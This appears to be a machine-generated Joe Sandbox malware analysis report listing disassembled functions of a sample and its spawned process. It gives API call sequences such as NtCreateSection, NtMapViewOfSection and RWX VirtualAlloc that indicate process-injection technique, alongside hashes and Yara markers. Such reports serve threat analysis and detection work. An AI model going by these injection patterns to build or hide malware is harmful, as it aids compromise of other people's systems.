Source File: 00000000.00000002.1759796388.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_wBgwzVbZuV.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: 620753ad965f63d69eadd59c880b602f741d140fbda77ca14c4d9ac3ebe426c0
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 3DD01232245228B7DB013A94DC09BCEBB5CDF09BA6F008421FB0DE9080CBB09A4046EA

Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F

Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F

Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F

Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F

Function 02DFA566 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02DFA5B7

Memory Dump Source

Source File: 00000000.00000002.1760101074.0000000002DF7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DF7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df7000_wBgwzVbZuV.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 75b69b4c2178a2487b395e89cfc4186c5634c4d4835b0d00773032a60770f224
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 85112B79A00208EFDB41DF98C985E98BBF5EF08350F058094FA489B361D371EA90DF94

Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 00401936

Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

Function 00415747 Relevance: 1.3, APIs: 1, Instructions: 23memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B17CDC,00415DED), ref: 00415778

Memory Dump Source

Source File: 00000000.00000002.1758701665.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_wBgwzVbZuV.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 491b2396958e246e7e1f57a1d5fd83289a83e0f0b88f12e6db4e963f9079e42a
Instruction ID: c7cd43120ea3207c5deb018b1e7389296927365904e67ce4adcfa047d92e18f4
Opcode Fuzzy Hash: 491b2396958e246e7e1f57a1d5fd83289a83e0f0b88f12e6db4e963f9079e42a
Instruction Fuzzy Hash: 5BC02B70847282CFDB0A8B3094080E67EE0E6DF2427A40CEDC5C3C70A1DF16054EDB04

Function 00415770 Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

LocalAlloc.KERNELBASE(00000000,02B17CDC,00415DED), ref: 00415778

Memory Dump Source

Source File: 00000000.00000002.1758701665.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_wBgwzVbZuV.jbxd

Similarity

API ID: AllocLocal
String ID:
API String ID: 3494564517-0
Opcode ID: 01577aeab97477f20e6bcb9141113acd5f2260016921a3d154c0a715cf2a4f24
Instruction ID: 6131ea327b8c01d7d03da24dd51081d073e1987c8407c645eead08220222526f
Opcode Fuzzy Hash: 01577aeab97477f20e6bcb9141113acd5f2260016921a3d154c0a715cf2a4f24
Instruction Fuzzy Hash: 36B092B09822009FE200CB50E804B117BA8A308242F404450F505C3140DF205810AA14

Non-executed Functions

Function 02C3092B Relevance: 3.8, Strings: 3, Instructions: 90COMMON

Download Yara Rule

Strings

l, xrefs: 02C30966
., xrefs: 02C3095F
GetProcAddress., xrefs: 02C309DC, 02C309DF, 02C309E4

Memory Dump Source

Source File: 00000000.00000002.1759796388.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_wBgwzVbZuV.jbxd

Yara matches

Similarity

API ID:
String ID: .$GetProcAddress.$l
API String ID: 0-2784972518
Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction ID: baf3e2fce7bdcc9cc6df0f9f84aab837d52465ef4d8e03c4d44481167807498e
Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
Instruction Fuzzy Hash: 993138B6900709DFDB11CF99C880AAEBBF9FF48324F15444AD841AB210D771EA45CFA4

Function 02DFA184 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1760101074.0000000002DF7000.00000040.00000020.00020000.00000000.sdmp, Offset: 02DF7000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2df7000_wBgwzVbZuV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction ID: 57c78f39569a2ea11449b0a547ab65cdbdd8d874aa8474091e383956daa62827
Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
Instruction Fuzzy Hash: 96115E72340100AFD794DF59DCC1FA673EAEB89364B2A8065EE08CB355D676EC42CB64

Function 00403277 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction ID: 8df8bbe6331efc2743c071309605838865bd09ee4bc9229f5037613db63a7100
Opcode Fuzzy Hash: d637f55854845c17b2ef1889abfa65daee778aef84c81fe99ca145d77efb4ab1
Instruction Fuzzy Hash: 3CF0F0A1E2E243AFCA0A1E34A916532AF1C751632372401FFA083752C2E23D0B17619F

Function 0040324F Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction ID: 9241026e722b7dd7cbe781a55eac82938fa1721c21c2f19ebd5655df2a8ce19b
Opcode Fuzzy Hash: 2e697f2bdb2541e438c090e00759e651186a60c26cca26bbac42aeca89057f02
Instruction Fuzzy Hash: 90F024A191E281DBCA0E1E2858169327F1C7A5230733405FF9093762C2E13D8B02619F

Function 02C30D90 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1759796388.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_wBgwzVbZuV.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction ID: 56441237cd5c039f5838cb6c375b9abb1796c206f619cba4e92d69c5b3f6c9d6
Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
Instruction Fuzzy Hash: C101A277B106048FDF22CF24C804BEA33E5FBC6216F4548A5D90A97281E774A941CB90

Function 00403256 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction ID: 0b233a05c36d383cd3dc693d5d52553799fa9f094e89171df70cdd77f1a33a14
Opcode Fuzzy Hash: ffb84ad0bafd287640d5e2703f1f7dee9546aae40f50b635da61e00f6775f880
Instruction Fuzzy Hash: 5CF027A1E6E202ABCA0E1E20AD165727F4D651132372401FFA053B63C1E17D4B07619F

Function 00403247 Relevance: .0, Instructions: 39COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction ID: 61f4eeca6a5bdba97633f9ce55ed0ebe4cfc5c7823726c26b0d716f95b27c2a1
Opcode Fuzzy Hash: 675dd5adc9fa045870a710e44379b64774d26f731239f7a86ac84ccf831d603a
Instruction Fuzzy Hash: 1EF027A191E242DBCA0D2E246D158322F4C295530733401FF9053B92C2E03E8B07619F

Function 0040326C Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction ID: 50319dc6f67c7bb301174255112627998741b5b21f267b3f7f348d4aa007f6d0
Opcode Fuzzy Hash: 7491e8d205a9a81a512842342f84d5d05ba67224b994174453f1348fb0568999
Instruction Fuzzy Hash: A5E068A2D2E2029BCA1E1E206D464333F4C625630B72001FF9053B92C1F03E4B0661DF

Function 00403290 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1758673917.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_wBgwzVbZuV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction ID: 65af031b81eeafed772fbc50416c1b4fdc84f259fd59d49ecec168145e9dac47
Opcode Fuzzy Hash: 4880d3875d1ad92a9fbe5811d46a77b3d6ce579c17d5e0502d0cbfecac410ff8
Instruction Fuzzy Hash: 3EE0ED92E6E2854BCAA52E30980A1623F5C69A331A32480FFA002A52D2F03E0F05815B

Function 00415970 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 67COMMON

Download Yara Rule

APIs

BuildCommDCBA.KERNEL32(00000000,?), ref: 0041599D
WritePrivateProfileStringA.KERNEL32(00417380,0041734C,00417328,00417314), ref: 004159C1
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004159C9
SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415A11
OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 00415A20
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415A31

Strings

-, xrefs: 00415A3E

Memory Dump Source

Source File: 00000000.00000002.1758701665.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_wBgwzVbZuV.jbxd

Similarity

API ID: BuildCalendarCommEnvironmentFreeInfoNameObjectOpenPathPrivateProfileShortStringStringsWrite
String ID: -
API String ID: 1791614364-2547889144
Opcode ID: 1a6b412cbcf8fd9bd43a67c6afaa262548802305dd34979990a078a0d8af13d4
Instruction ID: 5368a2a332436176f0270f6e324495ff1ab7250c8f8a8be8252ed3b816e40977
Opcode Fuzzy Hash: 1a6b412cbcf8fd9bd43a67c6afaa262548802305dd34979990a078a0d8af13d4
Instruction Fuzzy Hash: ED215B70A84308EBD750CF54DC86FD97BB4EB48761F1180A5FA49AA1C0CE7849C49B9A

Function 004159D9 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38COMMON

Download Yara Rule

APIs

SetCalendarInfoW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00415A11
OpenJobObjectA.KERNEL32(00000000,00000000,004173B4), ref: 00415A20
GetShortPathNameW.KERNEL32(00000000,?,00000000), ref: 00415A31

Strings

-, xrefs: 00415A3E

Memory Dump Source

Source File: 00000000.00000002.1758701665.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_wBgwzVbZuV.jbxd

Similarity

API ID: CalendarInfoNameObjectOpenPathShort
String ID: -
API String ID: 2381848886-2547889144
Opcode ID: 5cb3077d0ae9ce70326b3e9a9f23cbc4277cbfe19918473db3a624e41028dd7a
Instruction ID: 0db35e2b396c7aacfab1ac635380de6c7ec9f3e99e7bba80867eae6dc532c324
Opcode Fuzzy Hash: 5cb3077d0ae9ce70326b3e9a9f23cbc4277cbfe19918473db3a624e41028dd7a
Instruction Fuzzy Hash: 3701F931A84204DADB708F50DC82BD97BB4FB44765F124195F6887F1C0CE7419C4DB89

Function 00415A70 Relevance: 6.0, APIs: 4, Instructions: 42memoryCOMMON

Download Yara Rule

APIs

QueryDosDeviceW.KERNEL32(00000000,?,00000000), ref: 00415AA4
FreeEnvironmentStringsA.KERNEL32(00000000), ref: 00415ABF
HeapDestroy.KERNEL32(00000000), ref: 00415ADE
GetNumaProcessorNode.KERNEL32(00000000,00000000), ref: 00415AE8

Memory Dump Source

Source File: 00000000.00000002.1758701665.000000000040B000.00000020.00000001.01000000.00000003.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_40b000_wBgwzVbZuV.jbxd

Similarity

API ID: DestroyDeviceEnvironmentFreeHeapNodeNumaProcessorQueryStrings
String ID:
API String ID: 4159173863-0
Opcode ID: 3cf05308c2aadfedbc980055cb1876fd0d22092802d4cae8296a48a7dc0a4015
Instruction ID: 9b8f197d1e03404965dc2a48b96bd0ad9da3adac25fcf19301518012742e0a15
Opcode Fuzzy Hash: 3cf05308c2aadfedbc980055cb1876fd0d22092802d4cae8296a48a7dc0a4015
Instruction Fuzzy Hash: 5B01A270A80608EFE750EBA4EC85BDA77B8EB0C356F41403AF605D7280DE7459448F9A

Analysis Process: wehrbbiPID: 5772, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	9.5%
Dynamic/Decrypted Code Coverage:	29.7%
Signature Coverage:	0%
Total number of Nodes:	175
Total number of Limit Nodes:	7

Executed Functions

Function 00415B00 Relevance: 45.8, APIs: 24, Strings: 2, Instructions: 283
timefilelibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00415BF2
ReadConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00415BFF
FindAtomW.KERNEL32(00000000), ref: 00415C06
GetConsoleMode.KERNEL32(00000000,00000000), ref: 00415C0E
SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00415C26
GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00415C4D
MoveFileW.KERNEL32(00000000,00000000), ref: 00415C55
GetVersionExW.KERNEL32(?), ref: 00415C62
DisconnectNamedPipe.KERNEL32(?), ref: 00415C75
ReadConsoleOutputW.KERNEL32(00000000,?,?,?,?), ref: 00415CBA
GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00415CC9
GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00415CD2
PulseEvent.KERNEL32(00000000), ref: 00415CE2
SetCommState.KERNELBASE(00000000,00000000), ref: 00415D09
GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00415D3A
GetStringTypeExW.KERNEL32(00000000,00000000,00000000,00000000,?), ref: 00415D4B
GetComputerNameW.KERNEL32(?,?), ref: 00415D5F
GetTimeFormatW.KERNEL32(00000000,00000000,?,004173C0,?,00000000), ref: 00415D9F
GetFileAttributesA.KERNEL32(00000000), ref: 00415DA6
GetConsoleAliasExesLengthA.KERNEL32 ref: 00415DAC
GetBinaryType.KERNEL32(004173D8,?), ref: 00415DBE
LoadLibraryA.KERNELBASE(004173E8), ref: 00415E32
InterlockedDecrement.KERNEL32(?), ref: 00415E84
GetFileAttributesA.KERNEL32(004173F4), ref: 00415EB7

Strings

k`, xrefs: 00415E67
}$, xrefs: 00415E8B

Memory Dump Source

Source File: 00000005.00000002.2010315758.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_40b000_wehrbbi.jbxd

Similarity

API ID: Console$File$AttributesCommInterlockedLengthNameReadTimeType$AdjustmentAliasAliasesAtomBinaryCompareComputerConfigDecrementDefaultDisconnectEventExchangeExesFindFormatLibraryLoadModeModuleMoveNamedOutputPathPipePulseSearchStateStringSystemVersion
String ID: k`$}$
API String ID: 723190256-956986773
Opcode ID: 8b7da9863702e3dcd0db57a90b470b456827346f47e57f256fa4e14a1f125c19
Instruction ID: 59ac31373c954154000cefc7af6afdb20c2223af4aecfae594a4346f9e797540
Opcode Fuzzy Hash: 8b7da9863702e3dcd0db57a90b470b456827346f47e57f256fa4e14a1f125c19
Instruction Fuzzy Hash: 97A1C171941624DFC724DB61EC48EDB7B79EF8D340F4180AAF609A7250DB385A81CFA9

Function 00401514 Relevance: 10.7, APIs: 7, Instructions: 201
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction ID: b77a8bcfde574781322ebaec397cd5e92af5eb717990e6e7793f83a32abcc97b
Opcode Fuzzy Hash: 030196af5c35925124d1a5e0ae71aae975fd3bc268d3cb8e752286d8b76e3a9f
Instruction Fuzzy Hash: 24615E71900244FBEB209F95CC49FAF7BB8EF85700F20412AF912BA1E5D6749A01DB69

Function 004014FE Relevance: 10.7, APIs: 7, Instructions: 180
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623

Memory Dump Source

Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd

Similarity

API ID: Section$CreateDuplicateObjectView
String ID:
API String ID: 1652636561-0
Opcode ID: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction ID: 0ec8d6d4108695f7377ece7931361284e20275783593a2318d747dbe857377b0
Opcode Fuzzy Hash: 797714e4bcca61813209f29cc723c8138b20262a6c787ca69d6a1213da408676
Instruction Fuzzy Hash: 6A5129B5900209BFEB209F95CC48FEF7BB9EF85710F14412AF912BA2A5D6749901CB24

Function 00401542 Relevance: 10.7, APIs: 7, Instructions: 167
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401641
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401682
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016B3
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016D5

Memory Dump Source

Source File: 00000005.00000002.2010296726.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wehrbbi.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction ID: 759091ef041ca07c69b7a79068e02688b6544eb302bab9b440b0429bbb41aca5
Opcode Fuzzy Hash: 2b177f7e9ccc32c3765a626e79a5c8eb6b5311b77b213a5c8649f7db25de2716
Instruction Fuzzy Hash: E85119B1900249BFEB209F91CC48FAF7BB8EF85B10F144169F911BA2A5D6749941CB24

Function 00401549 Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
